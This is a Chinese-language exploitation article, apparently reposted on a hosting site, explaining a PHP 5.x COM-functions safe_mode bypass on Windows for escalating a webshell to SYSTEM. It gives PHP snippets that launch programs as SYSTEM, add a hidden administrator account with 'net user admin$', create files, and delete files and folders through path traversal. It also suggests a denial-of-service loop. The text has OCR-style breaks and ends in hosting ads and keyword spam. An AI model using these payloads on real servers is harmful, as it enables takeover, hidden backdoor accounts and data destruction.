漏洞PHP-5.x-COM-functions提权漏洞的利用分析

24k99 com  时间:2021-02-20  阅读:()

PHP 5.x COM functions提权漏洞的利用分析

PHP是英文“超级文本预处理语言” Hypertext Preprocessor的缩写是一种HTML内嵌式的语言。它可以比CGI或者Perl更快速地执行动态网页。PHP具有非常强大的功能所有的CGI或者JavaScript的功能 PHP都能实现支持几乎所有流行的数据库以及操作系统。 近期功能如此强大、运用如此广泛的PHP却出现了重大漏洞也就是PHP 5.xCOM functions safe_mode and disable_function bypass漏洞。它可以实现提权这是很多朋友们所梦寐以求的。下面我们先来总体介绍一下漏洞 由于本人水平有限请大家原谅不准确的地方。 漏洞所用到的COM函数只在Windows环境下的PHP才存在 .net的支持需要PHP5以及.net Runtime。漏洞所利用的函数无需特殊安装是PHP内核的一部分。Windows环境下的PHP默认支持这些扩展不用额外加载其他扩展来调用漏洞函数。

现在部分大中型网站都喜欢用PHP+Apache+Windows来架设这样的话 PHP漏洞的打击面就会很大了特别是在现在提权越来越难的形势下我想很多服务器会因为这个漏洞而沦陷的。 根据漏洞发现者公布的内容漏洞的利用要求php. ini中有如下设置。我的测试环境为PHP5.2.3+Apache2.2.3+Windows XP SP2在我的测试当中发现并不一定要严格按照这样配置大家可以自己测试一下看看。safe_mode=On

disable_functions=com_load_typel ibopen_basedir=htdocs

下面我们就逐一看看这个漏洞的内容与利用。compatUI .dl l中的RunAppl ication函数

这个漏洞的测试代码如下。

<?php

$compatUI=newCOM('{A-7F23-47E2-B7C3-97EE8DD42CD8}');

//加载compatUI .dl l $compatUI->RunAppl ication("something", "notepad.exe", 1);//运行记事本

?>

将其保存为PHP文件放到服务器上然后用IE访问就可以了。运行后IE是没有什么回显的如图1所示但实际上记事本已经运行了而且是SYSTEM权限 因为它是由系统服务来运行的所以继承了SYSTEM权限如图2所示。

利用这个漏洞我们可以运行已经上传好的木马实现WebShel l的提权。当然如果你足够无聊的话还可以写成循环让服务器运行很多记事本实现D.O.S。

Wscript运行命令

这个漏洞的测试代码如下。

<?php

$wscript=new COM('wscript.shel l '); //要用到wscript.exe

$wscript->Run("cmd.exe/c calc.exe");//运行calc.exe

?>

访问该脚本后服务器上出现了SYSTEM权限的calc.exe进程如图3所示。我们只要发挥一下想象力修改一下脚本就能加个管理员账户了具体代码如下。

<?php

$wscript=new COM('wscript.shel l ');$wscript->Run("cmd.exe/c net user admin$/add");$wscript->Run("cmd.exe/c net localgroup administrators admin$/add");

?>

访问该脚本之后即可添加管理员成功这对SYSTE M权限来说简直就是噩梦如图4所示

wshom.ocx中的OpenTextFi le

OpenTextFi le可以用于创建一个文件其中存在的漏洞的测试代码如下。

<?php

$mPath=str_repeat(". .\\",20);

$FSO=new COM('Scripting.Fi leSystemObject');//用到了wshom.ocx

$FSO->OpenTextFi le($mPath."bat.bat",8, true); //在服务器上创建文件虽然这个函数是用来打开文件的但是文件不存在就被创建了

?>

果然在C区根目录出现了这个批处理文件bat.b at如图5所示

wshom.ocx中的DeleteFi le

这个函数可以删除服务器上的文件大家要小心使用测试代码如下。<?php

$mPath=str_repeat(". .\\",20);

$FSOdelFi le=new COM('Scripting.Fi leSystemObject');

//利用了ws h o m.o cx

$FSOdelFi le->DeleteFi le($mPath.".\\*.dat",True);

//删除C区根目录的所有d at文件?>wshom.ocx中的DeleteFolder

利用这个函数可以删除服务器上的文件夹很恐怖哦。测试代码如下<?php

$mPath=str_repeat(". .\\",20);

$FSOdelFolder=new COM('Scripting.Fi leSystemObject');

//使用ws h o m.o cx

$FSOdelFolder->DeleteFolder($mPath.".\\1 1",True);

//删除特定的文件夹

?>

访问之后成功删除了c:\11这个文件夹。

shgina.dl l中Create函数创建账户

这个漏洞的测试代码如下

<?php

$user=new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}');

//利用shgina.dl l$user->Create("asd");

//创建账户asd

?>

不过这里要注意一下利用这个漏洞创建的账户只是属于users组的如图6所示

关于PHP 5.xCOM functions漏洞的利用就为大家介绍到这里了测试代码已经随文提供大家根据自己的需要进行适当修改即可。不过提醒大家一下 以上几个漏洞的利用前提是我们已经有了WebShel l 之后才可以上传用于提权的脚本切记哦

cyun29元/月,香港CN2 GIA云服务器低至起;香港多ip站群云服务器4核4G

cyun怎么样?cyun蓝米数据是一家(香港)藍米數據有限公司旗下品牌,蓝米云、蓝米主机等同属于该公司品牌。CYUN全系列云产品采用KVM架构,SSD磁盘阵列,优化线路,低延迟,高稳定。目前,cyun推出的香港云服务器性价比超高,香港cn2 gia云服务器,1核1G1M/系统盘+20G数据盘,低至29元/月起;香港多ip站群云服务器,16个ip/4核4G仅220元/月起,希望买香港站群服务器的站长...

选择Vultr VPS主机不支持支付宝付款的解决方案

在刚才更新Vultr 新年福利文章的时候突然想到前几天有网友问到自己有在Vultr 注册账户的时候无法用支付宝付款的问题,当时有帮助他给予解决,这里正好顺带一并介绍整理出来。毕竟对于来说,虽然使用的服务器不多,但是至少是见过世面的,大大小小商家的一些特性特征还是比较清楚的。在这篇文章中,和大家分享如果我们有在Vultr新注册账户或者充值购买云服务器的时候,不支持支付宝付款的原因。毕竟我们是知道的,...

云基最高500G DDoS无视CC攻击(Yunbase),洛杉矶CN2GIA、国内外高防服务器

云基成立于2020年,目前主要提供高防海内外独立服务器用户,欢迎各类追求稳定和高防优质线路的用户。业务可选:洛杉矶CN2-GIA+高防(默认500G高防)、洛杉矶CN2-GIA(默认带50Gbps防御)、香港CN2-GIA高防(双向CN2GIA专线,突发带宽支持,15G-20G DDoS防御,无视CC)、国内高防服务器(广州移动、北京多线、石家庄BGP、保定联通、扬州BGP、厦门BGP、厦门电信、...

24k99 com为你推荐
行业关键词关键词有哪些分类?无线路由器限速设置无线路由器限速怎么设置!公章制作word里如何制作公章?ps抠图技巧ps中怎么抠图?网店推广网站可以介绍几个可以做店铺推广的网站吗?中小企业信息化小企业需要信息化吗?需要的话要怎么实现信息化呢?xp系统停止服务Windowsxp系统为什么停止服务创维云电视功能什么是创维云电视啊?创维云电视是什么意思?mate8价格华为mate8市场价多少如何快速收录如何让百度快速收录
美国域名注册 域名空间购买 企业域名备案 狗爹 私人服务器 国内永久免费云服务器 国内加速器 免费smtp服务器 智能骨干网 权嘉云 有益网络 1g内存 shopex主机 安徽双线服务器 smtp虚拟服务器 linode支付宝 下载速度测试 阿里云手机官网 xuni 攻击服务器 更多